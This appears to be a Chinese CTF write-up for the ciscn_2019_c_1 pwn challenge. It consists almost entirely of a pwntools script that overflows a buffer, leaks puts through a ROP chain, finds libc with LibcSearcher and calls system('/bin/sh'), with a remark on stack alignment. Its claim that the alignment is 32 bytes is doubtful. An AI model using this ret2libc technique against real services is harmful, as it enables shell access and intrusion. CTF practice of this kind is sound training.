本题涉及了栈对齐问题,这个pwn在ubuntu18上运行,调用system的时候需要加1个retn来去补齐,目前不知道具体的原因。经实验再多加4个retn也可,可知这个栈对齐是32字节的。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 | from pwn import * from LibcSearcher import * context.log_level="debug" context(arch="amd64",os="linux") pop_rdi = 0x0000000000400c83 puts_got_addr = 0x602020 puts_plt_addr = 0x4006e0 encrypt_sym_addr = 0x4009A0 ret = 0x4006b9 #p = remote("node3.buuoj.cn",28578) p=process("./ciscn_2019_c_1") p.sendline("1") payload=b'0'*0x50+p64(0)+p64(pop_rdi)+p64(puts_got_addr)+p64(puts_plt_addr)+p64(encrypt_sym_addr) p.sendline(payload) p.recvuntil("Ciphertext\n") p.recvuntil("\n") GOT_puts=p.recvuntil("\n").split()[0] print(GOT_puts) for i in range(len(GOT_puts),8): GOT_puts += b'\x00' GOT_puts = u64(GOT_puts) libc = LibcSearcher("puts",GOT_puts) ADDR_LibC_base = GOT_puts - libc.dump("puts") ADDR_system = ADDR_LibC_base + libc.dump("system") ADDR_String_Sh = ADDR_LibC_base + libc.dump("str_bin_sh") payload=b'0'*0x50+p64(0)+p64(ret)+p64(ret)+p64(ret)+p64(ret)+p64(ret)+p64(pop_rdi)+p64(ADDR_String_Sh)+p64(ADDR_system) # 删去4个retn也可 p.sendline(payload) p.interactive() |